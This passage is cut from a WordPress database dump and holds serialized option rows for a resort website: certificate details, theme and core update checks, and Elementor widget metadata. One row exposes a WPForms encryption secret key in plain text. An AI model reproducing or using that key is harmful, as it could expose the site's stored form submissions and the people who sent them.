found','no'),(61708,'_transient_timeout_rsssl_certinfo','1598906284','no'),(61709,'_transient_rsssl_certinfo','a:16:{s:4:\"name\";s:19:\"/CN=ashbyresort.com\";s:7:\"subject\";a:1:{s:2:\"CN\";s:15:\"ashbyresort.com\";}s:4:\"hash\";s:8:\"bdf7950c\";s:6:\"issuer\";a:5:{s:1:\"C\";s:2:\"US\";s:2:\"ST\";s:2:\"TX\";s:1:\"L\";s:7:\"Houston\";s:1:\"O\";s:12:\"cPanel, Inc.\";s:2:\"CN\";s:36:\"cPanel, Inc. Certification Authority\";}s:7:\"version\";i:2;s:12:\"serialNumber\";s:38:\"85260161654199378627342002627822212816\";s:15:\"serialNumberHex\";s:32:\"40248284D442CDA7CE57E8DCC0C3D6D0\";s:9:\"validFrom\";s:13:\"200816000000Z\";s:7:\"validTo\";s:13:\"201114235959Z\";s:16:\"validFrom_time_t\";i:1597536000;s:14:\"validTo_time_t\";i:1605398399;s:15:\"signatureTypeSN\";s:10:\"RSA-SHA256\";s:15:\"signatureTypeLN\";s:23:\"sha256WithRSAEncryption\";s:16:\"signatureTypeNID\";i:668;s:8:\"purposes\";a:9:{i:1;a:3:{i:0;b:1;i:1;b:0;i:2;s:9:\"sslclient\";}i:2;a:3:{i:0;b:1;i:1;b:0;i:2;s:9:\"sslserver\";}i:3;a:3:{i:0;b:1;i:1;b:0;i:2;s:11:\"nssslserver\";}i:4;a:3:{i:0;b:0;i:1;b:0;i:2;s:9:\"smimesign\";}i:5;a:3:{i:0;b:0;i:1;b:0;i:2;s:12:\"smimeencrypt\";}i:6;a:3:{i:0;b:0;i:1;b:0;i:2;s:7:\"crlsign\";}i:7;a:3:{i:0;b:1;i:1;b:1;i:2;s:3:\"any\";}i:8;a:3:{i:0;b:1;i:1;b:0;i:2;s:10:\"ocsphelper\";}i:9;a:3:{i:0;b:0;i:1;b:0;i:2;s:13:\"timestampsign\";}}s:10:\"extensions\";a:10:{s:22:\"authorityKeyIdentifier\";s:66:\"keyid:7E:03:5A:65:41:6B:A7:7E:0A:E1:B8:9D:08:EA:1D:8E:1D:6A:C7:65\n\";s:20:\"subjectKeyIdentifier\";s:59:\"6C:5F:9D:8B:2B:65:1B:58:4A:55:F4:FE:26:57:9B:2E:0E:0F:A9:F6\";s:8:\"keyUsage\";s:35:\"Digital Signature, Key Encipherment\";s:16:\"basicConstraints\";s:8:\"CA:FALSE\";s:16:\"extendedKeyUsage\";s:60:\"TLS Web Server Authentication, TLS Web Client Authentication\";s:19:\"certificatePolicies\";s:88:\"Policy: 1.3.6.1.4.1.6449.1.2.2.52\n  CPS: https://sectigo.com/CPS\nPolicy: 2.23.140.1.2.1\n\";s:21:\"crlDistributionPoints\";s:78:\"\nFull Name:\n  URI:http://crl.comodoca.com/cPanelIncCertificationAuthority.crl\n\";s:19:\"authorityInfoAccess\";s:113:\"CA Issuers - URI:http://crt.comodoca.com/cPanelIncCertificationAuthority.crt\nOCSP - URI:http://ocsp.comodoca.com\n\";s:15:\"ct_precert_scts\";s:1161:\"Signed Certificate Timestamp:\n    Version   : v1 (0x0)\n    Log ID    : 07:B7:5C:1B:E5:7D:68:FF:F1:B0:C6:1D:23:15:C7:BA:\n                E6:57:7C:57:94:B7:6A:EE:BC:61:3A:1A:69:D3:A2:1C\n    Timestamp : Aug 16 04:29:00.558 2020 GMT\n    Extensions: none\n    Signature : ecdsa-with-SHA256\n                30:45:02:21:00:93:9A:1D:B1:87:2F:54:DC:EC:3F:CA:\n                7F:83:B0:9E:86:F3:61:94:89:0B:04:5A:C7:47:73:0A:\n                AA:A3:40:A7:71:02:20:07:29:20:BE:CA:F4:3F:10:C7:\n                D8:B3:FB:F5:0E:EB:95:D7:43:68:9B:71:17:06:A2:9D:\n                29:BA:3E:00:1B:69:1E\nSigned Certificate Timestamp:\n    Version   : v1 (0x0)\n    Log ID    : E7:12:F2:B0:37:7E:1A:62:FB:8E:C9:0C:61:84:F1:EA:\n                7B:37:CB:56:1D:11:26:5B:F3:E0:F3:4B:F2:41:54:6E\n    Timestamp : Aug 16 04:29:00.806 2020 GMT\n    Extensions: none\n    Signature : ecdsa-with-SHA256\n                30:45:02:20:10:AD:53:1D:D5:BF:C9:12:25:2E:C5:86:\n                33:F9:E5:42:6A:69:B8:DA:69:61:C3:2B:FF:22:D8:66:\n                96:6E:BE:19:02:21:00:F1:B4:FD:AA:C0:D5:36:4F:A0:\n                BD:31:AB:08:23:C8:1C:D4:E8:4A:BE:B0:2A:35:D6:65:\n                0B:BB:EF:69:FF:BD:57\";s:14:\"subjectAltName\";s:315:\"DNS:ashbyresort.com, DNS:ashbyresort.expcom.com, DNS:autodiscover.ashbyresort.com, DNS:cpanel.ashbyresort.com, DNS:cpcalendars.ashbyresort.com, DNS:cpcontacts.ashbyresort.com, DNS:mail.ashbyresort.com, DNS:webdisk.ashbyresort.com, DNS:webmail.ashbyresort.com, DNS:www.ashbyresort.com, DNS:www.ashbyresort.expcom.com\";}}','no'),(61710,'_transient_rsssl_plusone_count','0','yes'),(61721,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1604081982;s:7:\"checked\";a:8:{s:13:\"twentyfifteen\";s:3:\"2.7\";s:14:\"twentyfourteen\";s:3:\"2.9\";s:15:\"twentyseventeen\";s:3:\"2.4\";s:13:\"twentysixteen\";s:3:\"2.2\";s:10:\"university\";s:3:\"1.3\";s:13:\"vantage-child\";s:14:\"1.0.1459119848\";s:7:\"vantage\";s:3:\"2.6\";s:10:\"zerif-lite\";s:8:\"1.8.5.49\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:6:{s:13:\"twentyfifteen\";a:6:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"2.7\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.2.7.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentyfourteen\";a:6:{s:5:\"theme\";s:14:\"twentyfourteen\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentyfourteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentyfourteen.2.9.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"2.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.2.4.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:13:\"twentysixteen\";a:6:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.2.2.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:10:\"university\";a:6:{s:5:\"theme\";s:10:\"university\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:40:\"https://wordpress.org/themes/university/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/university.1.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:7:\"vantage\";a:6:{s:5:\"theme\";s:7:\"vantage\";s:11:\"new_version\";s:6:\"1.15.4\";s:3:\"url\";s:37:\"https://wordpress.org/themes/vantage/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/vantage.1.15.4.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:6:\"5.6.20\";}}s:12:\"translations\";a:0:{}}','no'),(61724,'_transient_timeout_tablepress_c_c4ca4238a0b923820dcc509a6f75849b','1605447853','no'),(61725,'_transient_tablepress_c_c4ca4238a0b923820dcc509a6f75849b','[\"tablepress_5f14ca09ec2bd2292a5a8d08ace8bff2\"]','no'),(61728,'_transient_timeout_tablepress_c_c81e728d9d4c2f636f067f89cc14862c','1605447853','no'),(61729,'_transient_tablepress_c_c81e728d9d4c2f636f067f89cc14862c','[\"tablepress_d68fbb01d22f50b7fb9b0fe5948bfa88\"]','no'),(61730,'wpforms_crypto_secret_key','bkl2RoAQ0kzsEuV9dHoTbaGEPVzmqWpJP1z8p3/RpWk=','yes'),(61733,'_transient_timeout_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3','1605463272','no'),(61734,'_transient_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3','[\"tablepress_aed1ac695d3b2b26eddc94e330a0afa1\"]','no'),(61753,'_transient_timeout_elementor_remote_info_api_data_3.0.4','1599139389','no'),(61754,'_transient_elementor_remote_info_api_data_3.0.4','a:4:{s:9:\"timestamp\";s:10:\"1599094878\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:59:{i:0;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:4;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:5;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:6;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:8;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:9;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:10;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:11;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:12;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:14;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:16;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:11:\"search-form\";s:5:\"title\";s:11:\"Search Form\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:19;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:20;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:21;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:23;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:24;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:25;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:27;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:28;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:29;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:30;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:31;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:32;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:33;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:34;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:35;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:36;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:37;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:38;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:39;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:40;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:41;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:42;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:43;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:44;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:45;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:46;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:47;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:48;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:49;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:50;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:51;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:58;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.4\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:26:{i:0;s:5:\"he_IL\";i:1;s:5:\"en_GB\";i:2;s:5:\"en_NZ\";i:3;s:5:\"en_ZA\";i:4;s:5:\"en_AU\";i:5;s:5:\"en_CA\";i:6;s:5:\"sv_SE\";i:7;s:5:\"da_DK\";i:8;s:5:\"fr_FR\";i:9;s:5:\"nl_NL\";i:10;s:5:\"nb_NO\";i:11;s:5:\"de_AT\";i:12;s:2:\"fi\";i:13;s:5:\"it_IT\";i:14;s:5:\"nn_NO\";i:15;s:5:\"de_CH\";i:16;s:5:\"en_GB\";i:17;s:5:\"is_IS\";i:18;s:2:\"ga\";i:19;s:5:\"fr_BE\";i:20;s:5:\"nl_BE\";i:21;s:3:\"ast\";i:22;s:5:\"lb_LU\";i:23;s:5:\"es_ES\";i:24;s:5:\"pt_PT\";i:25;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}}','no'),(61757,'_site_transient_timeout_browser_f3d1d270cf8670686ee175e1d9d86b9b','1599700991','no'),(61758,'_site_transient_browser_f3d1d270cf8670686ee175e1d9d86b9b','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"85.0.4183.83\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(61914,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:2:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.5.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.5.2-new-bundled.zip\";s:7:\"partial\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.5.2-partial-1.zip\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.5.2\";s:7:\"version\";s:5:\"5.5.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:5:\"5.5.1\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.5.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.5.2-new-bundled.zip\";s:7:\"partial\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.5.2-partial-1.zip\";s:8:\"rollback\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.5.2-rollback-1.zip\";}s:7:\"current\";s:5:\"5.5.2\";s:7:\"version\";s:5:\"5.5.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:5:\"5.5.1\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1604081970;s:15:\"version_checked\";s:5:\"5.5.1\";s:12:\"translations\";a:0:{}}','no'),(62015,'_transient_timeout_elementor_remote_info_api_data_3.0.5','1602381316','no'),(62016,'_transient_elementor_remote_info_api_data_3.0.5','a:4:{s:9:\"timestamp\";s:10:\"1602337886\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:59:{i:0;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:4;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:5;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:6;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:8;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price 